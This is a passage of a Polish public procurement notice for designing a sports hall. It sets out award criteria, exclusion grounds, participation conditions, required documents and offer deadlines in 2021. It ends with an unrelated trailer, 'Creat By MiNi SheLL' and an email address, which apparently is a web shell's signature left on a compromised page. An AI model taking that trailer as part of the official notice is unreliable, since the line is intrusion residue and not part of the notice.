postanowienia umowy w sprawie zamówienia publicznego,<br/>które zostaną wprowadzone do treści pierwotnej umowy (załącznik do SWZ) określają w szczególności<br/>jakie usługi Zamawiający przewiduje do realizacji w ramach powtórzenia podobnych usług. Podstawą<br/>do wszczęcia negocjacji będą wartości szacunkowe ustalone dla zamówień z wolnej ręki określone w<br/>podstawowym, pierwotnym zamówieniu. Całkowita wartość zamówienia uwzględnia również wartość<br/>zamówienia ustalona na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp. Zamawiający przewiduje wartość<br/>usług podobnych do 100% wartości zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria wyboru najkorzystniejszej oferty dla danego zadania to:<br/>1) cena - 60%,<br/>1) termin płatności - 40%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	W zakresie zdolności do występowania w obrocie gospodarczym: <br/> Opis sposobu dokonywania oceny spełniania tego warunku:<br/> Zamawiający nie precyzuje warunku.<br/>b) W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/> Opis sposobu dokonywania oceny spełniania tego warunku:<br/> Zamawiający nie precyzuje warunku.<br/>c)	W zakresie sytuacji ekonomicznej lub finansowej:<br/> Opis sposobu dokonywania oceny spełniania tego warunku:<br/> Zamawiający nie precyzuje warunku.<br/>d)	W zakresie zdolności technicznej lub zawodowej:<br/> Opis sposobu dokonywania oceny spełniania tego warunku:<br/><br/>W zakresie zdolności technicznej:<br/><br/>- osoby skierowane do realizacji zamówienia: <br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje lub będzie dysponować osobą lub osobami spełniającymi następujące warunki:<br/>Głównym projektantem - 1 (jedną) osobą posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie projektowania o specjalności architektonicznej bez ograniczeń, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane, <br/><br/>Jednocześnie osoby spełniające powyższy warunek to również osoby, których odpowiednie kwalifikacje zostały uznane na zasadach określonych w przepisach odrębnych (podstawa prawna art. 12a ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz.U. z 2020 r., poz. 1333 tj. z późn. zm.) lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r., poz. 220 tj. z późn. zm.).<br/>Przez doświadczenie zawodowe (w przypadku osób od których wymagane jest posiadanie uprawnień budowlanych, doświadczenie liczone jest w okresie od daty uzyskania stosownych uprawnień do daty składania ofert.<br/>Wszystkie wskazane osoby powinny posiadać biegłą znajomość języka polskiego. W przypadku, gdy wskazane osoby nie posiadają biegłej znajomości języka polskiego Wykonawca jest zobowiązany zapewnić tłumacza(y) języka polskiego, zapewniającego stałe, biegłe i fachowe tłumaczenie w kontaktach między Zamawiającym a Wykonawcą, na okres i dla potrzeb realizacji zamówienia. <br/>	Zdolność zawodowa: <br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: <br/><br/>- zrealizował co najmniej jedno zamówienie na wykonanie usługi polegającej na wykonaniu projektu budowy lub przebudowy hali sportowej o wartości kosztorysowej minimum 2.000.000,00 zł brutto (słownie: dwa miliony złotych). Uwaga: Nie wykazywać inwestycji o wartości niższej niż 2.000.000,00 zł brutto.<br/>Ocena spełnienia ww. warunku udziału w postępowaniu zostanie dokonana <br/>na podstawie przedłożonych przez Wykonawcę oświadczeń, dokumentów wg zasady spełnia/ nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca zobowiązany jest dołączyć do oferty (aktualne na dzień składania ofert) oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp. – zgodnie z załącznikiem nr 2 do SWZ.<br/>Informacje zawarte w w/w oświadczeniu stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, przedstawia, wraz z w/w oświadczeniem, także oświadczenie podmiotu udostępniającego<br/>zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, w/w oświadczenie składa<br/>każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>Zamawiający działając zgodnie z art. 274 ust. 2 ustawy Pzp. , jeśli uzna to za niezbędne do<br/>zapewnienia odpowiedniego przebiegu postępowania, MOŻE wezwać Wykonawców do złożenia:<br/>1) oświadczenia (w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp.) o braku przynależności do tej samej<br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(Dz. U. z 2020 r. poz. 1076 tj. ze zm.), z innym Wykonawcą, który złożył odrębną ofertę, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej – zgodnie z załącznikiem nr 3 do SWZ;<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia umocowania do<br/>działania w imieniu Wykonawcy.<br/>Wykonawca, którego oferta została najwyżej oceniona, zobowiązany jest (na wezwanie Zmawiającego) do złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>1) oświadczenia Wykonawcy (w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp.) o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 tj. ze zm.), z innym Wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do<br/>tej samej grupy kapitałowej – zgodnie z załącznikiem nr 3 do SWZ;<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej (w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp.) sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) oraz dokumentów potwierdzających spełnienie warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami – wg wzoru załącznika nr 4 do SWZ;<br/>2) wykaz zamówień wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca<br/>wykonania oraz podmiotów, na rzecz których zamówienia te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy zostały wykonane one należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego zamówienia były<br/>wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty – zgodnie z załącznikiem nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie precyzuje warunku. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami – wg wzoru załącznika nr 4 do SWZ;<br/>2) wykaz zamówień wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca<br/>wykonania oraz podmiotów, na rzecz których zamówienia te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy zostały wykonane one należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego zamówienia były<br/>wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty – zgodnie z załącznikiem nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia ( konsorcjum) - art. 58 ust.1<br/>ustawy Pzp. W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego, oraz załączają do oferty pełnomocnictwo<br/>(przygotowanie zgodnie z zapisami ust. 9 pkt 2 części VI SWZ) do reprezentowania<br/>Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Szczegółowy sposób spełniania warunków<br/>udziału w postępowaniu dla podmiotów wspólnie ubiegających się o udzielenie zamówienia<br/>został określony w części V SWZ „warunki udziału w postępowaniu”. Korespondencja będzie<br/>prowadzona z pełnomocnikiem (liderem).<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie z dyspozycją art. 117<br/>ust. 4 ustawy Pzp., dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają<br/>poszczególni wykonawcy – zgodnie z załącznikiem nr 7 do SWZ.<br/>Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie<br/>wybrana jako najkorzystniejsza, przed podpisaniem umowy Zamawiający może żądać<br/>przedłożenia umowy współpracy (np. umowa konsorcjum), zawierającą, co najmniej:<br/>- oświadczenie o solidarnej odpowiedzialności wszystkich partnerów wobec Zamawiającego za<br/>wykonanie umowy, a także w razie nie wykonania lub nienależytego wykonania obowiązków<br/>określonych umową zawartą z Zamawiającym.<br/>- wyznaczenie jednego z partnerów konsorcjum jako partnera kierującego (lidera), który będzie<br/>upoważniony do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu<br/>każdego, jak też dla wszystkich partnerów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści danej umowy stanowią załączniki do SWZ.<br/>2. Wybrany Wykonawca zobowiązany jest do zawarcia umowy zgodnie z warunkami<br/>określonymi w projektowanych postanowieniach umownych zawartych w załączniku do SWZ.<br/>3. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy.<br/>4. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy bez<br/>przeprowadzenia nowego postępowania o udzielenie zamówienia w przypadku wystąpienia co<br/>najmniej jednej z okoliczności wymienionych w projektowanych postanowieniach umownych<br/>zawartych w załączniku do SWZ.<br/>5. Postanowienia które stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. nie<br/>stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>6. Zmiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze stron, za zgodą<br/>drugiej strony umowy, na podstawie aneksu do umowy.<br/>7. Wszelkie zmiany umowy wymagają dla swej ważności formy pisemnej pod rygorem<br/>nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa OFERTĘ za pośrednictwem Platformy dostępnej pod adresem: https://zabkowiceslaskie.logintrade.net/rejestracja/ustawowe.html w ZAKŁADCE DANEGO POSTĘPOWANIA.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-13 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Terminy wykonania zamówienia: do 24 tygodni od daty podpisania umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com